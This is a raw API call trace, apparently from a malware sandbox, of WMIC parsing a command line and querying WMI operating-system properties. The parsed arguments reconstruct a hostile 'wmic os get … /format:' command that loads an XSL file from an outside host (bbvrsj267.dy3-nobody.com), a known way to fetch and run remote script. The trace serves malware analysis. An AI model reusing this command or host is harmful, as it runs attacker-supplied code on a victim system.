[0044.337] lstrlenW (lpString="get") returned 3
[0044.337] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="PATH", cchCount2=4) returned 1
[0044.337] lstrlenW (lpString="WHERE") returned 5
[0044.337] lstrlenW (lpString="get") returned 3
[0044.337] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="WHERE", cchCount2=5) returned 1
[0044.337] lstrlenW (lpString="(") returned 1
[0044.337] lstrlenW (lpString="get") returned 3
[0044.337] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="(", cchCount2=1) returned 3
[0044.337] lstrlenW (lpString="/") returned 1
[0044.337] lstrlenW (lpString="get") returned 3
[0044.337] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="/", cchCount2=1) returned 3
[0044.337] lstrlenW (lpString="-") returned 1
[0044.337] lstrlenW (lpString="get") returned 3
[0044.337] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="-", cchCount2=1) returned 3
[0044.337] lstrlenW (lpString="GET") returned 3
[0044.337] lstrlenW (lpString="get") returned 3
[0044.337] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
[0044.337] lstrlenW (lpString="/") returned 1
[0044.337] lstrlenW (lpString="get") returned 3
[0044.337] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="/", cchCount2=1) returned 3
[0044.337] lstrlenW (lpString="-") returned 1
[0044.337] lstrlenW (lpString="get") returned 3
[0044.337] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="-", cchCount2=1) returned 3
[0044.337] lstrlenW (lpString="get") returned 3
[0044.338] lstrlenW (lpString="get") returned 3
[0044.338] lstrlenW (lpString="GET") returned 3
[0044.338] lstrlenW (lpString="get") returned 3
[0044.338] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
[0044.338] lstrlenW (lpString="/") returned 1
[0044.338] lstrlenW (lpString="Kqncmv426") returned 9
[0044.338] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="/", cchCount2=1) returned 3
[0044.338] lstrlenW (lpString="-") returned 1
[0044.338] lstrlenW (lpString="Kqncmv426") returned 9
[0044.338] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="-", cchCount2=1) returned 3
[0044.338] lstrlenW (lpString="Kqncmv426") returned 9
[0044.338] lstrlenW (lpString="Kqncmv426") returned 9
[0044.338] lstrlenW (lpString=",") returned 1
[0044.338] lstrlenW (lpString=",") returned 1
[0044.338] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=",", cchCount1=1, lpString2=",", cchCount2=1) returned 2
[0044.338] lstrlenW (lpString="lgiet286a") returned 9
[0044.338] lstrlenW (lpString="lgiet286a") returned 9
[0044.338] memmove_s (in: _Destination=0x17d2f28, _DestinationSize=0x4, _Source=0x17d2f18, _SourceSize=0x4 | out: _Destination=0x17d2f28) returned 0x0
[0044.338] lstrlenW (lpString=",") returned 1
[0044.338] lstrlenW (lpString=",") returned 1
[0044.338] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=",", cchCount1=1, lpString2=",", cchCount2=1) returned 2
[0044.338] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.338] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.338] memmove_s (in: _Destination=0x18f0f8, _DestinationSize=0x8, _Source=0x17d2f28, _SourceSize=0x8 | out: _Destination=0x18f0f8) returned 0x0
[0044.338] lstrlenW (lpString=",") returned 1
[0044.339] lstrlenW (lpString=",") returned 1
[0044.339] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=",", cchCount1=1, lpString2=",", cchCount2=1) returned 2
[0044.339] lstrlenW (lpString="numberofusers") returned 13
[0044.339] lstrlenW (lpString="numberofusers") returned 13
[0044.339] memmove_s (in: _Destination=0x18f0e0, _DestinationSize=0xc, _Source=0x18f0f8, _SourceSize=0xc | out: _Destination=0x18f0e0) returned 0x0
[0044.339] lstrlenW (lpString=",") returned 1
[0044.339] lstrlenW (lpString="/") returned 1
[0044.339] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="/", cchCount1=1, lpString2=",", cchCount2=1) returned 3
[0044.339] lstrlenW (lpString="/") returned 1
[0044.339] lstrlenW (lpString="/") returned 1
[0044.339] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2
[0044.339] lstrlenW (lpString="?") returned 1
[0044.339] lstrlenW (lpString="format") returned 6
[0044.339] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="?", cchCount2=1) returned 3
[0044.339] lstrlenW (lpString="VALUE") returned 5
[0044.339] lstrlenW (lpString="format") returned 6
[0044.339] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="VALUE", cchCount2=5) returned 1
[0044.339] lstrlenW (lpString="ALL") returned 3
[0044.339] lstrlenW (lpString="format") returned 6
[0044.339] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="ALL", cchCount2=3) returned 3
[0044.339] lstrlenW (lpString="FORMAT") returned 6
[0044.339] lstrlenW (lpString="format") returned 6
[0044.339] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="FORMAT", cchCount2=6) returned 2
[0044.339] lstrlenW (lpString="/") returned 1
[0044.339] lstrlenW (lpString=":") returned 1
[0044.339] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=":", cchCount1=1, lpString2="/", cchCount2=1) returned 3
[0044.340] lstrlenW (lpString="-") returned 1
[0044.340] lstrlenW (lpString=":") returned 1
[0044.340] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=":", cchCount1=1, lpString2="-", cchCount2=1) returned 3
[0044.340] lstrlenW (lpString=":") returned 1
[0044.340] lstrlenW (lpString=":") returned 1
[0044.340] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=":", cchCount1=1, lpString2=":", cchCount2=1) returned 2
[0044.340] lstrlenW (lpString="/") returned 1
[0044.340] lstrlenW (lpString="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh") returned 66
[0044.340] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh", cchCount1=66, lpString2="/", cchCount2=1) returned 3
[0044.340] lstrlenW (lpString="-") returned 1
[0044.340] lstrlenW (lpString="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh") returned 66
[0044.340] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh", cchCount1=66, lpString2="-", cchCount2=1) returned 3
[0044.340] lstrlenW (lpString="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh") returned 66
[0044.340] lstrlenW (lpString="CSV") returned 3
[0044.340] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CSV", cchCount1=3, lpString2="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh", cchCount2=66) returned 1
[0044.340] lstrlenW (lpString="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh") returned 66
[0044.340] lstrlenW (lpString="HFORM") returned 5
[0044.340] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="HFORM", cchCount1=5, lpString2="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh", cchCount2=66) returned 1
[0044.340] lstrlenW (lpString="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh") returned 66
[0044.340] lstrlenW (lpString="HTABLE") returned 6
[0044.340] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="HTABLE", cchCount1=6, lpString2="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh", cchCount2=66) returned 1
[0044.340] lstrlenW (lpString="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh") returned 66
[0044.340] lstrlenW (lpString="LIST") returned 4
[0044.340] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LIST", cchCount1=4, lpString2="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh", cchCount2=66) returned 3
[0044.340] lstrlenW (lpString="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh") returned 66
[0044.340] lstrlenW (lpString="MOF") returned 3
[0044.340] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MOF", cchCount1=3, lpString2="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh", cchCount2=66) returned 3
[0044.340] lstrlenW (lpString="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh") returned 66
[0044.341] lstrlenW (lpString="RAWXML") returned 6
[0044.341] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="RAWXML", cchCount1=6, lpString2="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh", cchCount2=66) returned 3
[0044.341] lstrlenW (lpString="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh") returned 66
[0044.341] lstrlenW (lpString="TABLE") returned 5
[0044.341] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="TABLE", cchCount1=5, lpString2="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh", cchCount2=66) returned 3
[0044.341] lstrlenW (lpString="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh") returned 66
[0044.341] lstrlenW (lpString="VALUE") returned 5
[0044.341] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="VALUE", cchCount1=5, lpString2="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh", cchCount2=66) returned 3
[0044.341] lstrlenW (lpString="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh") returned 66
[0044.341] lstrlenW (lpString="XML") returned 3
[0044.341] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XML", cchCount1=3, lpString2="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh", cchCount2=66) returned 3
[0044.341] lstrlenW (lpString="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh") returned 66
[0044.341] lstrlenW (lpString="htable-sortby") returned 13
[0044.341] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="htable-sortby", cchCount1=13, lpString2="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh", cchCount2=66) returned 1
[0044.341] lstrlenW (lpString="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh") returned 66
[0044.341] lstrlenW (lpString="htable-sortby.xsl") returned 17
[0044.341] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="htable-sortby.xsl", cchCount1=17, lpString2="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh", cchCount2=66) returned 1
[0044.341] lstrlenW (lpString="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh") returned 66
[0044.341] lstrlenW (lpString="texttablewsys") returned 13
[0044.341] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="texttablewsys", cchCount1=13, lpString2="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh", cchCount2=66) returned 3
[0044.341] lstrlenW (lpString="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh") returned 66
[0044.341] lstrlenW (lpString="texttablewsys.xsl") returned 17
[0044.341] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="texttablewsys.xsl", cchCount1=17, lpString2="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh", cchCount2=66) returned 3
[0044.341] lstrlenW (lpString="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh") returned 66
[0044.341] lstrlenW (lpString="wmiclimofformat") returned 15
[0044.341] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclimofformat", cchCount1=15, lpString2="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh", cchCount2=66) returned 3
[0044.341] lstrlenW (lpString="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh") returned 66
[0044.341] lstrlenW (lpString="wmiclimofformat.xsl") returned 19
[0044.341] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclimofformat.xsl", cchCount1=19, lpString2="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh", cchCount2=66) returned 3
[0044.341] lstrlenW (lpString="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh") returned 66
[0044.341] lstrlenW (lpString="wmiclitableformat") returned 17
[0044.341] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclitableformat", cchCount1=17, lpString2="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh", cchCount2=66) returned 3
[0044.341] lstrlenW (lpString="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh") returned 66
[0044.341] lstrlenW (lpString="wmiclitableformat.xsl") returned 21
[0044.341] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclitableformat.xsl", cchCount1=21, lpString2="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh", cchCount2=66) returned 3
[0044.341] lstrlenW (lpString="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh") returned 66
[0044.342] lstrlenW (lpString="wmiclitableformatnosys") returned 22
[0044.342] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclitableformatnosys", cchCount1=22, lpString2="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh", cchCount2=66) returned 3
[0044.342] lstrlenW (lpString="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh") returned 66
[0044.342] lstrlenW (lpString="wmiclitableformatnosys.xsl") returned 26
[0044.342] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclitableformatnosys.xsl", cchCount1=26, lpString2="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh", cchCount2=66) returned 3
[0044.342] lstrlenW (lpString="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh") returned 66
[0044.342] lstrlenW (lpString="wmiclivalueformat") returned 17
[0044.342] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclivalueformat", cchCount1=17, lpString2="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh", cchCount2=66) returned 3
[0044.342] lstrlenW (lpString="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh") returned 66
[0044.342] lstrlenW (lpString="wmiclivalueformat.xsl") returned 21
[0044.342] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclivalueformat.xsl", cchCount1=21, lpString2="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh", cchCount2=66) returned 3
[0044.342] ??0CHString@@QAE@PBG@Z () returned 0x12f94c
[0044.342] ?Right@CHString@@QBE?AV1@H@Z () returned 0x12f950
[0044.342] ??0CHString@@QAE@PBG@Z () returned 0x12f954
[0044.342] _wcsicmp (_String1="xbrh", _String2=".xsl") returned 74
[0044.342] SysStringLen (param_1="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh") returned 0x42
[0044.342] SysStringLen (param_1=".xsl") returned 0x4
[0044.342] ??1CHString@@QAE@XZ () returned 0x920001
[0044.342] ??1CHString@@QAE@XZ () returned 0x8e0001
[0044.342] ??1CHString@@QAE@XZ () returned 0x1
[0044.343] GetCurrentThreadId () returned 0x9a8
[0044.343] ??0CHString@@QAE@XZ () returned 0x12f9c8
[0044.343] memmove_s (in: _Destination=0x18f0f8, _DestinationSize=0x10, _Source=0x18f0e0, _SourceSize=0x10 | out: _Destination=0x18f0f8) returned 0x0
[0044.343] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28
[0044.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x891f7c, cbMultiByte=-1, lpWideCharStr=0x18f858, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29
[0044.343] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c
[0044.343] SysStringLen (param_1="os") returned 0x2
[0044.343] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='os") returned 0x1e
[0044.343] SysStringLen (param_1="'") returned 0x1
[0044.344] IWbemServices:GetObject (in: This=0x63c74c, strObjectPath="MSFT_CliAlias.FriendlyName='os'", lFlags=0, pCtx=0x0, ppObject=0x12f9a0*=0x0, ppCallResult=0x0 | out: ppObject=0x12f9a0*=0x65c508, ppCallResult=0x0) returned 0x0
[0044.357] IWbemClassObject:Get (in: This=0x65c508, wszName="Formats", lFlags=0, pVal=0x12f908*(varType=0x0, wReserved1=0x12, wReserved2=0x3ea3, wReserved3=0x758f, varVal1=0x24d760, varVal2=0x12f8f4), pType=0x0, plFlavor=0x0 | out: pVal=0x12f908*(varType=0x200d, wReserved1=0x12, wReserved2=0x3ea3, wReserved3=0x758f, varVal1=0x236eb8*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x25d560, rgsabound=((cElements=0x7, lLbound=0))), varVal2=0x12f8f4), pType=0x0, plFlavor=0x0) returned 0x0
[0044.359] lstrlenW (lpString="SET") returned 3
[0044.359] lstrlenW (lpString="get") returned 3
[0044.359] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="SET", cchCount2=3) returned 1
[0044.359] SafeArrayGetLBound (in: psa=0x236eb8, nDim=0x1, plLbound=0x12f974 | out: plLbound=0x12f974) returned 0x0
[0044.359] SafeArrayGetUBound (in: psa=0x236eb8, nDim=0x1, plUbound=0x12f93c | out: plUbound=0x12f93c) returned 0x0
[0044.359] SafeArrayGetElement (in: psa=0x236eb8, rgIndices=0x12f99c, pv=0x12f9a8 | out: pv=0x12f9a8) returned 0x0
[0044.360] IWbemClassObject:Get (in: This=0x65ea48, wszName="Name", lFlags=0, pVal=0x12f928*(varType=0x0, wReserved1=0xffff, wReserved2=0x98da, wReserved3=0x7570, varVal1=0x897f73, varVal2=0x18f0f8), pType=0x0, plFlavor=0x0 | out: pVal=0x12f928*(varType=0x8, wReserved1=0xffff, wReserved2=0x98da, wReserved3=0x7570, varVal1="STATUS", varVal2=0x18f0f8), pType=0x0, plFlavor=0x0) returned 0x0
[0044.360] lstrlenW (lpString="FULL") returned 4
[0044.360] lstrlenW (lpString="STATUS") returned 6
[0044.360] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STATUS", cchCount1=6, lpString2="FULL", cchCount2=4) returned 3
[0044.360] IUnknown:Release (This=0x65ea48) returned 0x1
[0044.360] SafeArrayGetElement (in: psa=0x236eb8, rgIndices=0x12f99c, pv=0x12f9a8 | out: pv=0x12f9a8) returned 0x0
[0044.360] IWbemClassObject:Get (in: This=0x65fcc8, wszName="Name", lFlags=0, pVal=0x12f928*(varType=0x0, wReserved1=0xffff, wReserved2=0x98da, wReserved3=0x7570, varVal1=0x25d49c, varVal2=0x18f0f8), pType=0x0, plFlavor=0x0 | out: pVal=0x12f928*(varType=0x8, wReserved1=0xffff, wReserved2=0x98da, wReserved3=0x7570, varVal1="FREE", varVal2=0x18f0f8), pType=0x0, plFlavor=0x0) returned 0x0
[0044.360] lstrlenW (lpString="FULL") returned 4
[0044.360] lstrlenW (lpString="FREE") returned 4
[0044.360] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="FREE", cchCount1=4, lpString2="FULL", cchCount2=4) returned 1
[0044.360] IUnknown:Release (This=0x65fcc8) returned 0x1
[0044.360] SafeArrayGetElement (in: psa=0x236eb8, rgIndices=0x12f99c, pv=0x12f9a8 | out: pv=0x12f9a8) returned 0x0
[0044.360] IWbemClassObject:Get (in: This=0x66c600, wszName="Name", lFlags=0, pVal=0x12f928*(varType=0x0, wReserved1=0xffff, wReserved2=0x98da, wReserved3=0x7570, varVal1=0x25d49c, varVal2=0x18f0f8), pType=0x0, plFlavor=0x0 | out: pVal=0x12f928*(varType=0x8, wReserved1=0xffff, wReserved2=0x98da, wReserved3=0x7570, varVal1="FULL", varVal2=0x18f0f8), pType=0x0, plFlavor=0x0) returned 0x0
[0044.361] lstrlenW (lpString="FULL") returned 4
[0044.361] lstrlenW (lpString="FULL") returned 4
[0044.361] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="FULL", cchCount1=4, lpString2="FULL", cchCount2=4) returned 2
[0044.361] IWbemClassObject:Get (in: This=0x66c600, wszName="Properties", lFlags=0, pVal=0x12f8f8*(varType=0x0, wReserved1=0x0, wReserved2=0xf0f8, wReserved3=0x18, varVal1=0xacb2, varVal2=0x1), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8f8*(varType=0x200d, wReserved1=0x0, wReserved2=0xf0f8, wReserved3=0x18, varVal1=0x236ee8*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x232f90, rgsabound=((cElements=0x33, lLbound=0))), varVal2=0x1), pType=0x0, plFlavor=0x0) returned 0x0
[0044.364] SafeArrayGetLBound (in: psa=0x236ee8, nDim=0x1, plLbound=0x12f918 | out: plLbound=0x12f918) returned 0x0
[0044.364] SafeArrayGetUBound (in: psa=0x236ee8, nDim=0x1, plUbound=0x12f94c | out: plUbound=0x12f94c) returned 0x0
[0044.364] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.364] IWbemClassObject:Get (in: This=0x2239110, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x0, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1=0x757098da, varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="BootDevice", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.364] IWbemClassObject:Get (in: This=0x2239110, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x0, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1=0x12f92c, varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="BootDevice", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.364] lstrlenW (lpString="BootDevice") returned 10
[0044.364] lstrlenW (lpString="Kqncmv426") returned 9
[0044.364] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="BootDevice", cchCount2=10) returned 3
[0044.364] lstrlenW (lpString="BootDevice") returned 10
[0044.364] lstrlenW (lpString="lgiet286a") returned 9
[0044.364] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="BootDevice", cchCount2=10) returned 3
[0044.364] lstrlenW (lpString="BootDevice") returned 10
[0044.364] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.364] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="BootDevice", cchCount2=10) returned 3
[0044.364] lstrlenW (lpString="BootDevice") returned 10
[0044.364] lstrlenW (lpString="numberofusers") returned 13
[0044.364] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="BootDevice", cchCount2=10) returned 3
[0044.364] IUnknown:Release (This=0x2239110) returned 0x1
[0044.364] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.365] IWbemClassObject:Get (in: This=0x2239560, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="BootDevice", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="BuildNumber", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.365] IWbemClassObject:Get (in: This=0x2239560, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="BootDevice", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="BuildNumber", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.365] lstrlenW (lpString="BuildNumber") returned 11
[0044.365] lstrlenW (lpString="Kqncmv426") returned 9
[0044.365] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="BuildNumber", cchCount2=11) returned 3
[0044.365] lstrlenW (lpString="BuildNumber") returned 11
[0044.365] lstrlenW (lpString="lgiet286a") returned 9
[0044.365] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="BuildNumber", cchCount2=11) returned 3
[0044.365] lstrlenW (lpString="BuildNumber") returned 11
[0044.365] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.365] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="BuildNumber", cchCount2=11) returned 3
[0044.365] lstrlenW (lpString="BuildNumber") returned 11
[0044.365] lstrlenW (lpString="numberofusers") returned 13
[0044.365] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="BuildNumber", cchCount2=11) returned 3
[0044.365] IUnknown:Release (This=0x2239560) returned 0x1
[0044.365] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.365] IWbemClassObject:Get (in: This=0x2239970, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="BuildNumber", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="BuildType", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.365] IWbemClassObject:Get (in: This=0x2239970, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="BuildNumber", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="BuildType", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.365] lstrlenW (lpString="BuildType") returned 9
[0044.365] lstrlenW (lpString="Kqncmv426") returned 9
[0044.366] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="BuildType", cchCount2=9) returned 3
[0044.366] lstrlenW (lpString="BuildType") returned 9
[0044.366] lstrlenW (lpString="lgiet286a") returned 9
[0044.366] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="BuildType", cchCount2=9) returned 3
[0044.366] lstrlenW (lpString="BuildType") returned 9
[0044.366] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.366] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="BuildType", cchCount2=9) returned 3
[0044.366] lstrlenW (lpString="BuildType") returned 9
[0044.366] lstrlenW (lpString="numberofusers") returned 13
[0044.366] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="BuildType", cchCount2=9) returned 3
[0044.366] IUnknown:Release (This=0x2239970) returned 0x1
